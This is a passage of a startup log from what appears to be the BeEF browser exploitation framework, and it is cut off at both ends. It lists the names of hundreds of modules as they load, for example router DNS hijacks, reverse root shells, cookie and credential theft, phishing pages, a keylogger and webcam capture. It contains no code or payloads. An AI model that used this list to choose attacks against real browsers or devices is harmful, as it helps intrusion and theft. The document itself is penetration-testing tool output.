'detect_evernote_clipper' +[12:25:37][>] Soft Load module: 'detect_firebug' +[12:25:37][>] Soft Load module: 'vtiger_crm_upload_exploit' +[12:25:37][>] Soft Load module: 'coldfusion_dir_traversal_exploit' +[12:25:37][>] Soft Load module: 'pfsense_2_3_2_reverse_root_shell_csrf' +[12:25:37][>] Soft Load module: 'pfsense_reverse_root_shell_csrf' +[12:25:37][>] Soft Load module: 'qnx_qconn_command_execution' +[12:25:37][>] Soft Load module: 'wanem_command_execution' +[12:25:37][>] Soft Load module: 'kemp_command_execution' +[12:25:37][>] Soft Load module: 'apache_felix_remote_shell' +[12:25:37][>] Soft Load module: 'opencart_reset_password' +[12:25:37][>] Soft Load module: 'spring_framework_malicious_jar' +[12:25:37][>] Soft Load module: 'wipg1000_cmd_injection' +[12:25:37][>] Soft Load module: 'planet_vdr300nu_adsl_dns_hijack' +[12:25:37][>] Soft Load module: 'utstarcom_wa3002g4_dns_hijack' +[12:25:37][>] Soft Load module: 'linksys_befsr41_csrf' +[12:25:37][>] Soft Load module: 'Huawei_smartax_mt880_csrf' +[12:25:37][>] Soft Load module: 'dlink_dsl2740r_dns_hijack' +[12:25:37][>] Soft Load module: 'telstra_zte_mf91_disable_ap_isolation' +[12:25:37][>] Soft Load module: 'dlink_dir_615_csrf' +[12:25:37][>] Soft Load module: 'exper_ewm01_adsl_dns_hijack' +[12:25:37][>] Soft Load module: 'comtrend_ct_series_dns_hijack' +[12:25:37][>] Soft Load module: 'ddwrt_v24_sp1_cmd_exec' +[12:25:37][>] Soft Load module: 'dlink_2640b_dns_hijack' +[12:25:37][>] Soft Load module: 'dlink_dsl526b_dns_hijack' +[12:25:37][>] Soft Load module: 'dlink_dsl500t_csrf' +[12:25:37][>] Soft Load module: 'asus_dslx11_dns_hijack' +[12:25:37][>] Soft Load module: 'shuttle_tech_915wm_dns_hijack' +[12:25:37][>] Soft Load module: 'philips_dns_hijack' +[12:25:37][>] Soft Load module: 'cisco_e2400_csrf' +[12:25:37][>] Soft Load module: 'comtrend_ct5367_csrf' +[12:25:37][>] Soft Load module: 'argw4_adsl_dns_hijack' +[12:25:37][>] Soft Load module: 'pikatel_96338_dns_hijack' +[12:25:37][>] Soft Load module: 'iball_baton_ib_wra150n_dns_hijack' +[12:25:37][>] Soft Load module: 'dlink_dsl2780b_dns_hijack' +[12:25:37][>] Soft Load module: 'inteno_eg101r1_voip_dns_hijack' +[12:25:37][>] Soft Load module: 'linksys_e2500_csrf' +[12:25:37][>] Soft Load module: 'actiontec_q1000_csrf' +[12:25:37][>] Soft Load module: 'com_officeconnect_cmd_exec' +[12:25:37][>] Soft Load module: 'linksys_e2500_dns_hijack' +[12:25:37][>] Soft Load module: 'asmax_ar804gu_cmd_exec' +[12:25:37][>] Soft Load module: 'virgin_superhub_csrf' +[12:25:37][>] Soft Load module: 'bt_home_hub_csrf' +[12:25:37][>] Soft Load module: 'linksys_e2500_shell' +[12:25:37][>] Soft Load module: 'beetel_bcm96338_router_dns_hijack' +[12:25:37][>] Soft Load module: 'Netgear_dgn_2000_wan_mgmt_csrf' +[12:25:37][>] Soft Load module: 'netgear_dgn2200_cmd_exec' +[12:25:37][>] Soft Load module: 'tplink_dns_csrf' +[12:25:37][>] Soft Load module: 'asus_rt_n66u_cmd_exec' +[12:25:37][>] Soft Load module: 'ddwrt_v24_sp1_csrf' +[12:25:37][>] Soft Load module: 'linksys_wrt54g2_csrf' +[12:25:37][>] Soft Load module: 'telstra_zte_mf91_change_ssid' +[12:25:37][>] Soft Load module: 'telstra_zte_mf91_change_pw' +[12:25:37][>] Soft Load module: 'asus_rt_n12e_get_info' +[12:25:37][>] Soft Load module: 'linksys_wrt54g_csrf' +[12:25:37][>] Soft Load module: 'tenda_adsl_dns_hijack' +[12:25:37][>] Soft Load module: 'belkin_dns_csrf' +[12:25:37][>] Soft Load module: 'comtrend_ct5624_csrf' +[12:25:37][>] Soft Load module: 'dlink_dsl2640u_dns_hijack' +[12:25:37][>] Soft Load module: 'freenas_reverse_root_shell_csrf' +[12:25:37][>] Soft Load module: 'dlink_sharecenter_cmd_exec' +[12:25:37][>] Soft Load module: 'boastmachine_add_user_csrf' +[12:25:37][>] Soft Load module: 'zenoss_add_user_csrf' +[12:25:37][>] Soft Load module: 'hp_ucmdb_add_user_csrf' +[12:25:37][>] Soft Load module: 'glassfish_war_upload_xsrf' +[12:25:37][>] Soft Load module: 'ntfscommoncreate_dos' +[12:25:37][>] Soft Load module: 'shell_shock_scanner' +[12:25:37][>] Soft Load module: 'Wordpress_add_admin' +[12:25:37][>] Soft Load module: 'apache_cookies' +[12:25:37][>] Soft Load module: 'airlive_add_user_csrf' +[12:25:37][>] Soft Load module: 'linksys_wvc_wireless_camera_csrf' +[12:25:37][>] Soft Load module: 'Dlink_dcs_series_csrf' +[12:25:37][>] Soft Load module: 'firephp_code_exec' +[12:25:37][>] Soft Load module: 'Shell_shocked' +[12:25:37][>] Soft Load module: 'Netgear_gs108t_csrf' +[12:25:37][>] Soft Load module: 'Dlink_dgs_1100_device_reset_csrf' +[12:25:37][>] Soft Load module: 'Dlink_dgs_1100_fdb_whitelist_csrf' +[12:25:37][>] Soft Load module: 'Dlink_dgs_1100_port_mirroring_csrf' +[12:25:37][>] Soft Load module: 'groovyshell_server_command_execution' +[12:25:37][>] Soft Load module: 'jboss_jmx_upload_exploit' +[12:25:37][>] Soft Load module: 'skype_xss' +[12:25:37][>] Soft Load module: 'serendipity_1_6_xss' +[12:25:37][>] Soft Load module: 'sqlitemanager_xss' +[12:25:37][>] Soft Load module: 'cisco_collaboration_server_5_xss' +[12:25:37][>] Soft Load module: 'alienvault_ossim_3_1_xss' +[12:25:37][>] Soft Load module: 'extract_cmd_exec' +[12:25:37][>] Soft Load module: 'monowall_reverse_root_shell_csrf' +[12:25:37][>] Soft Load module: 'BeEF_bind_shell' +[12:25:37][>] Soft Load module: 'Eudora_mail_beef_bind' +[12:25:37][>] Soft Load module: 'Active_fax_beef_bind' +[12:25:37][>] Soft Load module: 'zeroshell_2_0rc2_admin_password' +[12:25:37][>] Soft Load module: 'zeroshell_2_0rc2_reverse_shell_csrf_sop_bypass' +[12:25:37][>] Soft Load module: 'zeroshell_2_0rc2_migrate_hook' +[12:25:37][>] Soft Load module: 'zeroshell_2_0rc2_file_disclosure' +[12:25:37][>] Soft Load module: 'zeroshell_2_0rc2_admin_static_token' +[12:25:37][>] Soft Load module: 'zeroshell_2_0rc2_scanner' +[12:25:37][>] Soft Load module: 'zeroshell_2_0rc2_admin_dynamic_token' +[12:25:37][>] Soft Load module: 'zeroshell_2_0rc2_reverse_shell_csrf_sop' +[12:25:37][>] Soft Load module: 'jenkins_groovy_code_exec' +[12:25:37][>] Soft Load module: 'zenoss_command_execution' +[12:25:37][>] Soft Load module: 'activex_command_execution' +[12:25:37][>] Soft Load module: 'ie_ms12_004_midi' +[12:25:37][>] Soft Load module: 'windows_mail_client_dos' +[12:25:37][>] Soft Load module: 'java_payload' +[12:25:37][>] Soft Load module: 'signed_applet_dropper' +[12:25:37][>] Soft Load module: 'ie_ms13_069_caret' +[12:25:37][>] Soft Load module: 'safari_launch_app' +[12:25:37][>] Soft Load module: 'ruby_nntpd_cmd_exec' +[12:25:37][>] Soft Load module: 'farsite_X25_remote_shell' +[12:25:37][>] Soft Load module: 'php_dos' +[12:25:37][>] Soft Load module: 'rfi_scanner' +[12:25:37][>] Soft Load module: 'resource_exhaustion_dos' +[12:25:37][>] Soft Load module: 'phonegap_check_connection' +[12:25:37][>] Soft Load module: 'phonegap_list_files' +[12:25:37][>] Soft Load module: 'phonegap_start_record_audio' +[12:25:37][>] Soft Load module: 'phonegap_file_upload' +[12:25:37][>] Soft Load module: 'phonegap_prompt_user' +[12:25:37][>] Soft Load module: 'phonegap_persist_resume' +[12:25:37][>] Soft Load module: 'phonegap_globalization_status' +[12:25:37][>] Soft Load module: 'phonegap_keychain' +[12:25:37][>] Soft Load module: 'phonegap_list_contacts' +[12:25:37][>] Soft Load module: 'phonegap_persistence' +[12:25:37][>] Soft Load module: 'phonegap_alert_user' +[12:25:37][>] Soft Load module: 'phonegap_geo_locate' +[12:25:37][>] Soft Load module: 'phonegap_plugin_detection' +[12:25:37][>] Soft Load module: 'phonegap_detect' +[12:25:37][>] Soft Load module: 'phonegap_stop_record_audio' +[12:25:37][>] Soft Load module: 'phonegap_beep' +[12:25:37][>] Soft Load module: 'steal_autocomplete' +[12:25:37][>] Soft Load module: 'text_to_voice' +[12:25:37][>] Soft Load module: 'pretty_theft' +[12:25:37][>] Soft Load module: 'gmail_phishing' +[12:25:37][>] Soft Load module: 'ui_abuse_ie' +[12:25:37][>] Soft Load module: 'fake_lastpass' +[12:25:37][>] Soft Load module: 'tabnabbing' +[12:25:37][>] Soft Load module: 'sitekiosk_breakout' +[12:25:37][>] Soft Load module: 'fake_notification_ie' +[12:25:37][>] Soft Load module: 'replace_video_fake_plugin' +[12:25:37][>] Soft Load module: 'fake_notification' +[12:25:37][>] Soft Load module: 'clippy' +[12:25:37][>] Soft Load module: 'fake_evernote_clipper' +[12:25:37][>] Soft Load module: 'firefox_extension_reverse_shell' +[12:25:37][>] Soft Load module: 'simple_hijacker' +[12:25:37][>] Soft Load module: 'hta_powershell' +[12:25:37][>] Soft Load module: 'clickjacking' +[12:25:37][>] Soft Load module: 'spoof_addressbar_data' +[12:25:37][>] Soft Load module: 'fake_notification_c' +[12:25:37][>] Soft Load module: 'lcamtuf_download' +[12:25:37][>] Soft Load module: 'edge_wscript_wsh_injection' +[12:25:37][>] Soft Load module: 'firefox_extension_dropper' +[12:25:37][>] Soft Load module: 'firefox_extension_bindshell' +[12:25:37][>] Soft Load module: 'fake_notification_ff' +[12:25:37][>] Soft Load module: 'fake_flash_update' +[12:25:37][>] Soft Load module: 'cross_site_printing' +[12:25:37][>] Soft Load module: 'cross_site_faxing' +[12:25:37][>] Soft Load module: 'inter_protocol_win_bindshell' +[12:25:37][>] Soft Load module: 'etag_client' +[12:25:37][>] Soft Load module: 's2c_dns_tunnel' +[12:25:37][>] Soft Load module: 'inter_protocol_imap' +[12:25:37][>] Soft Load module: 'inter_protocol_redis' +[12:25:37][>] Soft Load module: 'inter_protocol_posix_bindshell' +[12:25:37][>] Soft Load module: 'inter_protocol_irc' +[12:25:37][>] Soft Load module: 'send_inotes' +[12:25:37][>] Soft Load module: 'extract_inotes_list' +[12:25:37][>] Soft Load module: 'send_inotes_with_attachment' +[12:25:37][>] Soft Load module: 'read_inotes' +[12:25:37][>] Soft Load module: 'inotes_flooder' +[12:25:37][>] Soft Load module: 'read_gmail' +[12:25:37][>] Soft Load module: 'invisible_iframe' +[12:25:37][>] Soft Load module: 'local_file_theft' +[12:25:37][>] Soft Load module: 'iframe_keylogger' +[12:25:37][>] Soft Load module: 'wordpress_current_user_info' +[12:25:37][>] Soft Load module: 'wordpress_add_user' +[12:25:37][>] Soft Load module: 'wordpress_upload_rce_plugin' +[12:25:37][>] Soft Load module: 'wordpress_post_auth_rce' +[12:25:37][>] Soft Load module: 'unblockui' +[12:25:37][>] Soft Load module: 'iframe_sniffer' +[12:25:37][>] Soft Load module: 'raw_javascript' +[12:25:37][>] Soft Load module: 'blockui' +[12:25:37][>] Soft Load module: 'no_sleep' +[12:25:37][>] Soft Load module: 'cryptoloot_miner' +[12:25:37][>] Soft Load module: 'track_physical_movement' +[12:25:37][>] Soft Load module: 'detect_airdroid' +[12:25:37][>] Soft Load module: 'get_registry_keys' +[12:25:37][>] Soft Load module: 'iphone_tel' +[12:25:37][>] Soft Load module: 'detect_protocol_handlers' +[12:25:37][>] Soft Load module: 'physical_location_thirdparty' +[12:25:37][>] Soft Load module: 'detect_coupon_printer' +[12:25:37][>] Soft Load module: 'hook_microsoft_edge' +[12:25:37][>] Soft Load module: 'detect_hp' +[12:25:37][>] Soft Load module: 'detect_local_drives' +[12:25:37][>] Soft Load module: 'get_battery_status' +[12:25:37][>] Soft Load module: 'detect_cups' +[12:25:37][>] Soft Load module: 'get_system_info_java' +[12:25:37][>] Soft Load module: 'get_internal_ip_java' +[12:25:37][>] Soft Load module: 'detect_antivirus' +[12:25:37][>] Soft Load module: 'clipboard_theft' +[12:25:37][>] Soft Load module: 'physical_location' +[12:25:37][>] Soft Load module: 'detect_google_desktop' +[12:25:37][>] Soft Load module: 'detect_default_browser' +[12:25:37][>] Soft Load module: 'get_internal_ip_webrtc' +[12:25:37][>] Soft Load module: 'get_connection_type' +[12:25:37][>] Soft Load module: 'detect_users' +[12:25:37][>] Soft Load module: 'detect_software' +[12:25:37][>] Soft Load module: 'get_wireless_keys' +[12:25:37][>] Soft Load module: 'hook_default_browser' +[12:25:37][>] Soft Load module: 'popunder_window' +[12:25:37][>] Soft Load module: 'popunder_window_ie' +[12:25:37][>] Soft Load module: 'iframe_above' +[12:25:37][>] Soft Load module: 'hijack_opener' +[12:25:37][>] Soft Load module: 'invisible_htmlfile_activex' +[12:25:37][>] Soft Load module: 'confirm_close_tab' +[12:25:37][>] Soft Load module: 'man_in_the_browser' +[12:25:37][>] Soft Load module: 'jsonp_service_worker' +[12:25:37][>] Soft Load module: 'send_gvoice_sms' +[12:25:37][>] Soft Load module: 'get_all_cookies' +[12:25:37][>] Soft Load module: 'execute_tabs' +[12:25:37][>] Soft Load module: 'grab_google_contacts' +[12:25:37][>] Soft Load module: 'inject_beef' +[12:25:37][>] Soft Load module: 'screenshot' +[12:25:37][>] Server: mounted handler '/command/internal_network_fingerprinting.js' +[12:25:37][>] Hard Load module: 'internal_network_fingerprinting' +[12:25:37][>] Server: mounted handler '/command/detect_burp.js' +[12:25:37][>] Hard Load module: 'detect_burp' +[12:25:37][>] Server: mounted handler '/command/get_http_servers.js' +[12:25:37][>] Hard Load module: 'get_http_servers' +[12:25:37][>] Server: mounted handler '/command/detect_tor.js' +[12:25:37][>] Hard Load module: 'detect_tor' +[12:25:37][>] Server: mounted handler '/command/irc_nat_pinning.js' +[12:25:37][>] Hard Load module: 'irc_nat_pinning' +[12:25:37][>] Server: mounted handler '/command/get_ntop_network_hosts.js' +[12:25:37][>] Hard Load module: 'get_ntop_network_hosts' +[12:25:37][>] Server: mounted handler '/command/doser.js' +[12:25:37][>] Hard Load module: 'doser' +[12:25:37][>] Server: mounted handler '/command/detect_soc_nets.js' +[12:25:37][>] Hard Load module: 'detect_soc_nets' +[12:25:37][>] Server: mounted handler '/command/ping_sweep_ff.js' +[12:25:37][>] Hard Load module: 'ping_sweep_ff' +[12:25:37][>] Server: mounted handler '/command/cross_origin_scanner_cors.js' +[12:25:37][>] Hard Load module: 'cross_origin_scanner_cors' +[12:25:37][>] Server: mounted handler '/command/dns_enumeration.js' +[12:25:37][>] Hard Load module: 'dns_enumeration' +[12:25:37][>] Server: mounted handler '/command/cross_origin_scanner_flash.js' +[12:25:37][>] Hard Load module: 'cross_origin_scanner_flash' +[12:25:37][>] Server: mounted handler '/command/get_proxy_servers_wpad.js' +[12:25:37][>] Hard Load module: 'get_proxy_servers_wpad' +[12:25:37][>] Server: mounted handler '/command/port_scanner.js' +[12:25:37][>] Hard Load module: 'port_scanner' +[12:25:37][>] Server: mounted handler '/command/fingerprint_routers.js' +[12:25:37][>] Hard Load module: 'fingerprint_routers' +[12:25:37][>] Server: mounted handler '/command/ping_sweep.js' +[12:25:37][>] Hard Load module: 'ping_sweep' +[12:25:37][>] Server: mounted handler '/command/f5_bigip_cookie_stealing.js' +[12:25:37][>] Hard Load module: 'f5_bigip_cookie_stealing' +[12:25:37][>] Server: mounted handler '/command/f5_bigip_cookie_disclosure.js' +[12:25:37][>] Hard Load module: 'f5_bigip_cookie_disclosure' +[12:25:37][>] Server: mounted handler '/command/sw_port_scanner.js' +[12:25:37][>] Hard Load module: 'sw_port_scanner' +[12:25:37][>] Server: mounted handler '/command/ping_sweep_java.js' +[12:25:37][>] Hard Load module: 'ping_sweep_java' +[12:25:37][>] Server: mounted handler '/command/identify_lan_subnets.js' +[12:25:37][>] Hard Load module: 'identify_lan_subnets' +[12:25:37][>] Server: mounted handler '/command/dns_rebinding.js' +[12:25:37][>] Hard Load module: 'dns_rebinding' +[12:25:37][>] Server: mounted handler '/command/test_return_image.js' +[12:25:37][>] Hard Load module: 'test_return_image' +[12:25:37][>] Server: mounted handler '/command/test_network_request.js' +[12:25:37][>] Hard Load module: 'test_network_request' +[12:25:37][>] Server: mounted handler '/command/test_http_redirect.js' +[12:25:37][>] Hard Load module: 'test_http_redirect' +[12:25:37][>] Server: mounted handler '/command/test_return_ascii_chars.js' +[12:25:37][>] Hard Load module: 'test_return_ascii_chars' +[12:25:37][>] Server: mounted handler '/command/test_dns_tunnel_client.js' +[12:25:37][>] Hard Load module: 'test_dns_tunnel_client' +[12:25:37][>] Server: mounted handler '/command/test_beef_debug.js' +[12:25:37][>] Hard Load module: 'test_beef_debug' +[12:25:37][>] Server: mounted handler '/command/test_get_variable.js' +[12:25:37][>] Hard Load module: 'test_get_variable' +[12:25:37][>] Server: mounted handler '/command/test_return_long_string.js' +[12:25:37][>] Hard Load module: 'test_return_long_string' +[12:25:37][>] Server: mounted handler '/command/test_cors_request.js' +[12:25:37][>] Hard Load module: 'test_cors_request' +[12:25:37][>] Server: mounted handler '/command/Detect_unity.js' +[12:25:37][>] Hard Load module: 'Detect_unity' +[12:25:37][>] Server: mounted handler '/command/detect_office.js' +[12:25:37][>] Hard Load module: 'detect_office' +[12:25:37][>] Server: mounted handler '/command/unhook.js' +[12:25:37][>] Hard Load module: 'unhook' +[12:25:37][>] Server: mounted handler '/command/avant_steal_history.js' +[12:25:37][>] Hard Load module: 'avant_steal_history' +[12:25:37][>] Server: mounted handler '/command/detect_wmp.js' +[12:25:37][>] Hard Load module: 'detect_wmp' +[12:25:37][>] Server: mounted handler '/command/detect_vlc.js' +[12:25:37][>] Hard Load module: 'detect_vlc' +[12:25:37][>] Server: mounted handler '/command/browser_fingerprinting.js' +[12:25:37][>] Hard Load module: 'browser_fingerprinting' +[12:25:37][>] Server: mounted handler '/command/webcam.js' +[12:25:37][>] Hard Load module: 'webcam' +[12:25:37][>] Server: mounted handler '/command/get_visited_domains.js' +[12:25:37][>] Hard Load module: 'get_visited_domains' +[12:25:37][>] Server: mounted handler '/command/detect_foxit.js' +[12:25:37][>] Hard Load module: 'detect_foxit' +[12:25:37][>] Server: mounted handler '/command/Detect_toolbars.js' +[12:25:37][>] Hard Load module: 'Detect_toolbars' +[12:25:37][>] Server: mounted handler '/command/detect_realplayer.js' +[12:25:37][>] Hard Load module: 'detect_realplayer' +[12:25:37][>] Server: mounted handler '/command/detect_quicktime.js' +[12:25:37][>] Hard Load module: 'detect_quicktime' +[12:25:37][>] Server: mounted handler '/command/get_visited_urls.js' +[12:25:37][>] Hard Load module: 'get_visited_urls' +[12:25:37][>] Server: mounted handler '/command/fingerprint_browser.js' +[12:25:37][>] Hard Load module: 'fingerprint_browser' +[12:25:37][>] Server: mounted handler '/command/remove_hook_element.js' +[12:25:37][>] Hard Load module: 'remove_hook_element' +[12:25:37][>] Server: mounted handler '/command/detect_lastpass.js' +[12:25:37][>] Hard Load module: 'detect_lastpass' +[12:25:37][>] Server: mounted handler '/command/detect_simple_adblock.js' +[12:25:37][>] Hard Load module: 'detect_simple_adblock' +[12:25:37][>] Server: mounted handler '/command/webcam_html5.js' +[12:25:37][>] Hard Load module: 'webcam_html5' +[12:25:37][>] Server: mounted handler '/command/get_page_html_iframe.js' +[12:25:37][>] Hard Load module: 'get_page_html_iframe' +[12:25:37][>] Server: mounted handler '/command/link_rewrite_sslstrip.js' +[12:25:37][>] Hard Load module: 'link_rewrite_sslstrip' +[12:25:37][>] Server: mounted handler '/command/rickroll.js' +[12:25:37][>] Hard Load module: 'rickroll' +[12:25:37][>] Server: mounted handler '/command/link_rewrite_click_events.js' +[12:25:37][>] Hard Load module: 'link_rewrite_click_events' +[12:25:37][>] Server: mounted handler '/command/prompt_dialog.js' +[12:25:37][>] Hard Load module: 'prompt_dialog' +[12:25:37][>] Server: mounted handler '/command/get_form_values.js' +[12:25:37][>] Hard Load module: 'get_form_values' +[12:25:37][>] Server: mounted handler '/command/ajax_fingerprint.js' +[12:25:37][>] Hard Load module: 'ajax_fingerprint' +[12:25:37][>] Server: mounted handler '/command/deface_web_page_component.js' +[12:25:37][>] Hard Load module: 'deface_web_page_component' +[12:25:37][>] Server: mounted handler '/command/mobilesafari_address_spoofing.js' +[12:25:37][>] Hard Load module: 'mobilesafari_address_spoofing' +[12:25:37][>] Server: mounted handler '/command/deface_web_page.js' +[12:25:37][>] Hard Load module: 'deface_web_page' +[12:25:37][>] Server: mounted handler '/command/link_rewrite.js' +[12:25:37][>] Hard Load module: 'link_rewrite' +[12:25:37][>] Server: mounted handler '/command/get_stored_credentials.js' +[12:25:37][>] Hard Load module: 'get_stored_credentials' +[12:25:37][>] Server: mounted handler '/command/link_rewrite_tel.js' +[12:25:37][>] Hard Load module: 'link_rewrite_tel' +[12:25:37][>] Server: mounted handler '/command/remove_stuck_iframes.js' +[12:25:37][>] Hard Load module: 'remove_stuck_iframes' +[12:25:37][>] Server: mounted handler '/command/get_cookie.js' +[12:25:37][>] Hard Load module: 'get_cookie' +[12:25:37][>] Server: mounted handler '/command/clear_console.js' +[12:25:37][>] Hard Load module: 'clear_console' +[12:25:37][>] Server: mounted handler '/command/alert_dialog.js' +[12:25:37][>] Hard Load module: 'alert_dialog' +[12:25:37][>] Server: mounted handler '/command/site_redirect.js' +[12:25:37][>] Hard Load module: 'site_redirect' +[12:25:37][>] Server: mounted handler '/command/site_redirect_iframe.js' +[12:25:37][>] Hard Load module: 'site_redirect_iframe' +[12:25:37][>] Server: mounted handler '/command/get_local_storage.js' +[12:25:37][>] Hard Load module: 'get_local_storage' +[12:25:37][>] Server: mounted handler '/command/replace_video.js' +[12:25:37][>] Hard Load module: 'replace_video' +[12:25:37][>] Server: mounted handler '/command/overflow_cookiejar.js' +[12:25:37][>] Hard Load module: 'overflow_cookiejar' +[12:25:37][>] Server: mounted handler '/command/get_page_html.js' +[12:25:37][>] Hard Load module: 'get_page_html' +[12:25:37][>] Server: mounted handler '/command/get_page_links.js' +[12:25:37][>] Hard Load module: 'get_page_links' +[12:25:37][>] Server: mounted handler '/command/get_session_storage.js' +[12:25:37][>] Hard Load module: 'get_session_storage' +[12:25:37][>] Server: mounted handler '/command/disable_developer_tools.js' +[12:25:37][>] Hard Load module: 'disable_developer_tools' +[12:25:37][>] Server: mounted handler '/command/detect_silverlight.js' +[12:25:37][>] Hard Load module: 'detect_silverlight' +[12:25:37][>] Server: mounted handler '/command/detect_mime_types.js' +[12:25:37][>] Hard Load module: 'detect_mime_types' +[12:25:37][>] Server: mounted handler '/command/webcam_permission_check.js' +[12:25:37][>] Hard Load module: 'webcam_permission_check' +[12:25:37][>] Server: mounted handler '/command/detect_extensions.js' +[12:25:37][>] Hard Load module: 'detect_extensions' +[12:25:37][>] Server: mounted handler '/command/detect_unsafe_activex.js' +[12:25:37][>] Hard Load module: 'detect_unsafe_activex' +[12:25:37][>] Server: mounted handler '/command/detect_activex.js' +[12:25:37][>] Hard Load module: 'detect_activex' +[12:25:37][>] Server: mounted handler '/command/spyder_eye.js' +[12:25:37][>] Hard Load module: 'spyder_eye' +[12:25:37][>] Server: mounted handler '/command/Play_sound.js' +[12:25:37][>] Hard Load module: 'Play_sound' +[12:25:37][>] Server: mounted handler '/command/detect_popup_blocker.js' +[12:25:37][>] Hard Load module: 'detect_popup_blocker' +[12:25:37][>] Server: mounted handler '/command/detect_evernote_clipper.js' +[12:25:37][>] Hard Load module: 'detect_evernote_clipper' +[12:25:37][>] Server: mounted handler '/command/detect_firebug.js' +[12:25:37][>] Hard Load module: 'detect_firebug' +[12:25:37][>] Server: mounted handler '/command/vtiger_crm_upload_exploit.js' +[12:25:37][>] Hard Load module: 'vtiger_crm_upload_exploit' +[12:25:37][>] Server: mounted handler '/command/coldfusion_dir_traversal_exploit.js' +[12:25:37][>] Hard Load module: 'coldfusion_dir_traversal_exploit' +[12:25:37][>] Server: mounted handler '/command/pfsense_2_3_2_reverse_root_shell_csrf.js' +[12:25:37][>] Hard Load module: 'pfsense_2_3_2_reverse_root_shell_csrf' +[12:25:37][>] Server: mounted handler '/command/pfsense_reverse_root_shell_csrf.js' +[12:25:37][>] Hard Load module: 'pfsense_reverse_root_shell_csrf' +[12:25:37][>] Server: mounted handler '/command/qnx_qconn_command_execution.js' +[12:25:37][>] Hard Load module: 'qnx_qconn_command_execution' +[12:25:37][>] Server: mounted handler '/command/wanem_command_execution.js' +[12:25:37][>] Hard Load module: 'wanem_command_execution' +[12:25:37][>] Server: mounted handler '/command/kemp_command_execution.js' +[12:25:37][>] Hard Load module: 'kemp_command_execution' +[12:25:37][>] Server: mounted handler '/command/apache_felix_remote_shell.js' +[12:25:37][>] Hard Load module: 'apache_felix_remote_shell' +[12:25:37][>] Server: mounted handler '/command/opencart_reset_password.js' +[12:25:37][>] Hard Load module: 'opencart_reset_password' +[12:25:37][>] Server: mounted handler '/command/spring_framework_malicious_jar.js' +[12:25:37][>] Hard Load module: 'spring_framework_malicious_jar' +[12:25:37][>] Server: mounted handler '/command/wipg1000_cmd_injection.js' +[12:25:37][>] Hard Load module: 'wipg1000_cmd_injection' +[12:25:37][>] Server: mounted handler '/command/planet_vdr300nu_adsl_dns_hijack.js' +[12:25:37][>] Hard Load module: 'planet_vdr300nu_adsl_dns_hijack' +[12:25:37][>] Server: mounted handler '/command/utstarcom_wa3002g4_dns_hijack.js' +[12:25:37][>] Hard Load module: 'utstarcom_wa3002g4_dns_hijack' +[12:25:37][>] Server: mounted handler '/command/linksys_befsr41_csrf.js' +[12:25:37][>] Hard Load module: 'linksys_befsr41_csrf' +[12:25:37][>] Server: mounted handler '/command/Huawei_smartax_mt880_csrf.js' +[12:25:37][>] Hard Load module: 'Huawei_smartax_mt880_csrf' +[12:25:37][>] Server: mounted handler '/command/dlink_dsl2740r_dns_hijack.js' +[12:25:37][>] Hard Load module: 'dlink_dsl2740r_dns_hijack' +[12:25:37][>] Server: mounted handler '/command/telstra_zte_mf91_disable_ap_isolation.js' +[12:25:37][>] Hard Load module: 'telstra_zte_mf91_disable_ap_isolation' +[12:25:37][>] Server: mounted handler '/command/dlink_dir_615_csrf.js' +[12:25:37][>] Hard Load module: 'dlink_dir_615_csrf' +[12:25:37][>] Server: mounted handler '/command/exper_ewm01_adsl_dns_hijack.js' +[12:25:37][>] Hard Load module: 'exper_ewm01_adsl_dns_hijack' +[12:25:37][>] Server: mounted handler '/command/comtrend_ct_series_dns_hijack.js' +[12:25:37][>] Hard Load module: 'comtrend_ct_series_dns_hijack' +[12:25:37][>] Server: mounted handler '/command/ddwrt_v24_sp1_cmd_exec.js' +[12:25:37][>] Hard Load module: 'ddwrt_v24_sp1_cmd_exec' +[12:25:37][>] Server: mounted handler '/command/dlink_2640b_dns_hijack.js' +[12:25:37][>] Hard Load module: 'dlink_2640b_dns_hijack' +[12:25:37][>] Server: mounted handler '/command/dlink_dsl526b_dns_hijack.js' +[12:25:37][>] Hard Load module: 'dlink_dsl526b_dns_hijack' +[12:25:37][>] Server: mounted handler '/command/dlink_dsl500t_csrf.js' +[12:25:37][>] Hard Load module: 'dlink_dsl500t_csrf' +[12:25:37][>] Server: mounted handler '/command/asus_dslx11_dns_hijack.js' +[12:25:37][>] Hard Load module: 'asus_dslx11_dns_hijack' +[12:25:37][>] Server: mounted handler '/command/shuttle_tech_915wm_dns_hijack.js' +[12:25:37][>] Hard Load module: 'shuttle_tech_915wm_dns_hijack' +[12:25:37][>] Server: mounted handler '/command/philips_dns_hijack.js' +[12:25:37][>] Hard Load module: 'philips_dns_hijack' +[12:25:37][>] Server: mounted handler '/command/cisco_e2400_csrf.js' +[12:25:37][>] Hard Load module: 'cisco_e2400_csrf' +[12:25:37][>] Server: mounted handler '/command/comtrend_ct5367_csrf.js' +[12:25:37][>] Hard Load module: 'comtrend_ct5367_csrf' +[12:25:37][>] Server: mounted handler '/command/argw4_adsl_dns_hijack.js' +[12:25:37][>] Hard Load module: 'argw4_adsl_dns_hijack' +[12:25:37][>] Server: mounted handler '/command/pikatel_96338_dns_hijack.js' +[12:25:37][>] Hard Load module: 'pikatel_96338_dns_hijack' +[12:25:37][>] Server: mounted handler '/command/iball_baton_ib_wra150n_dns_hijack.js' +[12:25:37][>] Hard Load module: 'iball_baton_ib_wra150n_dns_hijack' +[12:25:37][>] Server: mounted handler '/command/dlink_dsl2780b_dns_hijack.js' +[12:25:37][>] Hard Load module: 'dlink_dsl2780b_dns_hijack' +[12:25:37][>] Server: mounted handler '/command/inteno_eg101r1_voip_dns_hijack.js' +[12:25:37][>] Hard Load module: 'inteno_eg101r1_voip_dns_hijack' +[12:25:37][>] Server: mounted handler '/command/linksys_e2500_csrf.js' +[12:25:37][>] Hard Load module: 'linksys_e2500_csrf' +[12:25:37][>] Server: mounted handler '/command/actiontec_q1000_csrf.js' +[12:25:37][>] Hard Load module: 'actiontec_q1000_csrf' +[12:25:37][>] Server: mounted handler '/command/com_officeconnect_cmd_exec.js' +[12:25:37][>] Hard Load module: 'com_officeconnect_cmd_exec' +[12:25:37][>] Server: mounted handler '/command/linksys_e2500_dns_hijack.js' +[12:25:37][>] Hard Load module: 'linksys_e2500_dns_hijack' +[12:25:37][>] Server: mounted handler '/command/asmax_ar804gu_cmd_exec.js' +[12:25:37][>] Hard Load module: 'asmax_ar804gu_cmd_exec' +[12:25:37][>] Server: mounted handler '/command/virgin_superhub_csrf.js' +[12:25:37][>] Hard Load module: 'virgin_superhub_csrf' +[12:25:37][>] Server: mounted handler '/command/bt_home_hub_csrf.js' +[12:25:37][>] Hard Load module: 